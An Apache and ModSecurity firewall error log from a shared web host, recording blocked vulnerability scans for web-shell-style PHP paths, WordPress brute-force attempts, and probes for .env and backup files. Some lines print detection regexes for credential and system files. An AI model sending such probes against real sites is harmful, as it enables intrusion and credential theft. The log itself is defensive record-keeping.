[Tue May 26 12:45:13.009365 2026] [security2:error] [pid 448967:tid 449216] [client 4.201.75.230:46068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/bless.php"] [unique_id "ahVIgeXLPuWQsfM-UVSXVgAAAHc"]
[Tue May 26 12:45:14.100348 2026] [security2:error] [pid 448967:tid 449153] [client 4.201.75.230:46025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/aa.php"] [unique_id "ahVIguXLPuWQsfM-UVSXcAAAADg"]
[Tue May 26 12:45:14.368584 2026] [security2:error] [pid 448967:tid 449131] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVIgeXLPuWQsfM-UVSXaAAAACI"]
[Tue May 26 12:45:14.629676 2026] [security2:error] [pid 448967:tid 449151] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIguXLPuWQsfM-UVSXdgAAADY"]
[Tue May 26 12:45:15.125991 2026] [ssl:error] [pid 448967:tid 449169] [client 98.84.1.175:11834] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname autoconfig.madhuraclinic.svijaykumar.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 12:45:16.321266 2026] [security2:error] [pid 448967:tid 449104] [client 92.246.141.118:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIg-XLPuWQsfM-UVSXowAAAAc"]
[Tue May 26 12:45:16.924684 2026] [security2:error] [pid 448967:tid 449218] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIhOXLPuWQsfM-UVSXsQAAAHk"]
[Tue May 26 12:45:16.963284 2026] [security2:error] [pid 448967:tid 449153] [client 4.201.75.230:46030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/xmrlpc.php"] [unique_id "ahVIhOXLPuWQsfM-UVSXwQAAADg"]
[Tue May 26 12:45:17.667296 2026] [security2:error] [pid 448967:tid 449115] [client 45.151.139.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIheXLPuWQsfM-UVSXyQAAABI"], referer: https://www.anujtradingco.com/
[Tue May 26 12:45:18.945513 2026] [security2:error] [pid 448967:tid 449104] [client 45.151.139.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIhuXLPuWQsfM-UVSX4QAAAAc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 12:45:19.048003 2026] [security2:error] [pid 448967:tid 449173] [client 4.201.75.230:46065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/class.php"] [unique_id "ahVIh-XLPuWQsfM-UVSX6AAAAEw"]
[Tue May 26 12:45:19.749787 2026] [security2:error] [pid 448967:tid 449109] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIh-XLPuWQsfM-UVSX8AAAAAw"]
[Tue May 26 12:45:20.080134 2026] [security2:error] [pid 448967:tid 449112] [client 157.20.138.61:57872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIiOXLPuWQsfM-UVSYBQAAAA8"]
[Tue May 26 12:45:20.080279 2026] [security2:error] [pid 448967:tid 449112] [client 157.20.138.61:57872] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIiOXLPuWQsfM-UVSYBQAAAA8"]
[Tue May 26 12:45:22.007617 2026] [security2:error] [pid 448967:tid 449132] [client 4.201.75.230:46066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/aw.php"] [unique_id "ahVIiuXLPuWQsfM-UVSYLgAAACM"]
[Tue May 26 12:45:23.145648 2026] [security2:error] [pid 448967:tid 449186] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIiuXLPuWQsfM-UVSYRAAAAFk"]
[Tue May 26 12:45:23.195473 2026] [security2:error] [pid 448967:tid 449224] [client 4.201.75.230:46020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/bb.php"] [unique_id "ahVIi-XLPuWQsfM-UVSYUgAAAH8"]
[Tue May 26 12:45:23.671727 2026] [security2:error] [pid 448967:tid 449174] [client 45.151.139.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIi-XLPuWQsfM-UVSYWwAAAE0"], referer: https://anujtradingco.com
[Tue May 26 12:45:25.696531 2026] [security2:error] [pid 448967:tid 449194] [client 4.201.75.230:46037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/222.php"] [unique_id "ahVIjeXLPuWQsfM-UVSYjQAAAGE"]
[Tue May 26 12:45:26.339312 2026] [security2:error] [pid 448967:tid 449100] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIjeXLPuWQsfM-UVSYlAAAAAM"]
[Tue May 26 12:45:27.478720 2026] [security2:error] [pid 448967:tid 449110] [client 4.201.75.230:5361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/test1.php"] [unique_id "ahVIj-XLPuWQsfM-UVSYsQAAAA0"]
[Tue May 26 12:45:29.215077 2026] [security2:error] [pid 448967:tid 449148] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIkOXLPuWQsfM-UVSYxgAAADM"]
[Tue May 26 12:45:29.322572 2026] [security2:error] [pid 448967:tid 449200] [client 149.62.41.5:54310] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "149.62.41.5" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVIkeXLPuWQsfM-UVSY0wAAAGc"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 12:45:30.638902 2026] [security2:error] [pid 448967:tid 449139] [client 157.20.138.61:58225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIkuXLPuWQsfM-UVSY8AAAACo"]
[Tue May 26 12:45:30.639077 2026] [security2:error] [pid 448967:tid 449139] [client 157.20.138.61:58225] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIkuXLPuWQsfM-UVSY8AAAACo"]
[Tue May 26 12:45:31.917741 2026] [security2:error] [pid 448967:tid 449159] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIk-XLPuWQsfM-UVSZAAAAAD4"]
[Tue May 26 12:45:34.614213 2026] [security2:error] [pid 448967:tid 449109] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIluXLPuWQsfM-UVSZLwAAAAw"]
[Tue May 26 12:45:35.394082 2026] [security2:error] [pid 448967:tid 449104] [client 62.60.130.233:53629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "organicveggie.tk.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVIl-XLPuWQsfM-UVSZQwAAAAc"], referer: https://www.linkedin.com/
[Tue May 26 12:45:35.731990 2026] [security2:error] [pid 448967:tid 449125] [client 62.60.130.233:55779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "organicveggie.tk.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVIl-XLPuWQsfM-UVSZSgAAABw"], referer: https://www.facebook.com/
[Tue May 26 12:45:37.360126 2026] [security2:error] [pid 448967:tid 449216] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVImOXLPuWQsfM-UVSZYwAAAHc"]
[Tue May 26 12:45:37.385575 2026] [security2:error] [pid 448967:tid 449114] [client 4.201.75.230:5260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/css/autoload_classmap.php"] [unique_id "ahVImeXLPuWQsfM-UVSZcQAAABE"]
[Tue May 26 12:45:37.645421 2026] [security2:error] [pid 448967:tid 449176] [client 31.57.184.107:53268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "zeexo.glorodrc.com"] [uri "/wp-login.php"] [unique_id "ahVImeXLPuWQsfM-UVSZdgAAAE8"], referer: https://duckduckgo.com/
[Tue May 26 12:45:38.019321 2026] [security2:error] [pid 448967:tid 449071] [remote 111.229.141.137:36658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVImeXLPuWQsfM-UVSZewAAIWc"]
[Tue May 26 12:45:38.341290 2026] [security2:error] [pid 448967:tid 449196] [client 54.87.247.130:35372] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "keydussecurity.com"] [uri "/"] [unique_id "ahVImuXLPuWQsfM-UVSZhwAAAGM"]
[Tue May 26 12:45:40.486036 2026] [security2:error] [pid 448967:tid 449123] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVInOXLPuWQsfM-UVSZvQAAABo"], referer: https://www.anujtradingco.com/
[Tue May 26 12:45:40.596158 2026] [security2:error] [pid 448967:tid 449155] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVInOXLPuWQsfM-UVSZtAAAADo"]
[Tue May 26 12:45:40.848124 2026] [security2:error] [pid 448967:tid 449140] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVInOXLPuWQsfM-UVSZyQAAACs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430734&moderation-hash=a20bc0fb2911a8e00a99b53c3f34fd6d
[Tue May 26 12:45:41.311487 2026] [security2:error] [pid 448967:tid 449215] [client 157.20.138.61:58575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIneXLPuWQsfM-UVSZ3AAAAHY"]
[Tue May 26 12:45:41.311659 2026] [security2:error] [pid 448967:tid 449215] [client 157.20.138.61:58575] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIneXLPuWQsfM-UVSZ3AAAAHY"]
[Tue May 26 12:45:41.557397 2026] [security2:error] [pid 448967:tid 449164] [client 202.76.169.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIneXLPuWQsfM-UVSZ2QAAAEM"]
[Tue May 26 12:45:41.681349 2026] [security2:error] [pid 448967:tid 449132] [client 5.255.125.45:33870] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "axum-vermogen.eu"] [uri "/.env.local"] [unique_id "ahVIneXLPuWQsfM-UVSZ7QAAACM"]
[Tue May 26 12:45:41.681496 2026] [security2:error] [pid 448967:tid 449132] [client 5.255.125.45:33870] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "axum-vermogen.eu"] [uri "/.env.local"] [unique_id "ahVIneXLPuWQsfM-UVSZ7QAAACM"]
[Tue May 26 12:45:41.684531 2026] [security2:error] [pid 448967:tid 449199] [client 5.255.125.45:33872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "axum-vermogen.eu"] [uri "/.env"] [unique_id "ahVIneXLPuWQsfM-UVSZ7gAAAGY"]
[Tue May 26 12:45:41.897765 2026] [security2:error] [pid 448967:tid 449161] [client 5.255.125.45:33872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "axum-vermogen.eu"] [uri "/.env.bak"] [unique_id "ahVIneXLPuWQsfM-UVSZ9AAAAEA"]
[Tue May 26 12:45:41.925584 2026] [security2:error] [pid 448967:tid 449207] [client 5.255.125.45:33880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "axum-vermogen.eu"] [uri "/.env.backup"] [unique_id "ahVIneXLPuWQsfM-UVSZ9QAAAG4"]
[Tue May 26 12:45:42.444833 2026] [core:error] [pid 448967:tid 449215] [client 198.235.24.164:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:45:42.444850 2026] [core:error] [pid 448967:tid 449215] [client 198.235.24.164:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:45:42.449228 2026] [core:error] [pid 448967:tid 449101] [client 198.235.24.164:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:45:42.449251 2026] [core:error] [pid 448967:tid 449101] [client 198.235.24.164:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:45:43.490448 2026] [security2:error] [pid 448967:tid 449183] [client 4.201.75.230:5268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/fx.php"] [unique_id "ahVIn-XLPuWQsfM-UVSaMwAAAFY"]
[Tue May 26 12:45:43.540264 2026] [security2:error] [pid 448967:tid 449210] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIn-XLPuWQsfM-UVSaLAAAAHE"]
[Tue May 26 12:45:44.595444 2026] [security2:error] [pid 448967:tid 449116] [client 85.208.96.203:16924] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-january/day/2022-10-30/"] [unique_id "ahVIoOXLPuWQsfM-UVSaRwAAABM"]
[Tue May 26 12:45:44.595582 2026] [security2:error] [pid 448967:tid 449116] [client 85.208.96.203:16924] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-january/day/2022-10-30/"] [unique_id "ahVIoOXLPuWQsfM-UVSaRwAAABM"]
[Tue May 26 12:45:44.837423 2026] [security2:error] [pid 448967:tid 449212] [client 4.201.75.230:46028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/gelay.php"] [unique_id "ahVIoOXLPuWQsfM-UVSaTgAAAHM"]
[Tue May 26 12:45:45.858408 2026] [security2:error] [pid 448967:tid 449126] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIoeXLPuWQsfM-UVSaWwAAAB0"]
[Tue May 26 12:45:46.312573 2026] [security2:error] [pid 448967:tid 449216] [client 4.201.75.230:46042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/god4m.php"] [unique_id "ahVIouXLPuWQsfM-UVSacAAAAHc"]
[Tue May 26 12:45:46.484745 2026] [security2:error] [pid 448967:tid 449199] [client 69.48.202.178:61824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.202.48.69.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVIouXLPuWQsfM-UVSabwAAAGY"], referer: https://anujtradingco.com
[Tue May 26 12:45:46.785019 2026] [security2:error] [pid 448967:tid 449097] [client 69.48.202.178:61915] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVIouXLPuWQsfM-UVSaeAAAAAA"], referer: https://anujtradingco.com
[Tue May 26 12:45:47.746963 2026] [security2:error] [pid 448967:tid 449165] [client 172.226.44.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVIouXLPuWQsfM-UVSaawAAAEQ"]
[Tue May 26 12:45:47.859312 2026] [security2:error] [pid 448967:tid 449133] [client 4.201.75.230:5257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/mari.php"] [unique_id "ahVIo-XLPuWQsfM-UVSajwAAACQ"]
[Tue May 26 12:45:48.582248 2026] [security2:error] [pid 448967:tid 449099] [client 43.157.62.101:41528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.62.157.43.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-signup.php"] [unique_id "ahVIpOXLPuWQsfM-UVSanAAAAAI"], referer: http://www.rainadelproperties.com.taotechservices.com
[Tue May 26 12:45:48.905873 2026] [security2:error] [pid 448967:tid 449223] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIpOXLPuWQsfM-UVSamwAAAH4"]
[Tue May 26 12:45:48.943218 2026] [core:crit] [pid 448967:tid 449098] (13)Permission denied: [client 74.7.175.149:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
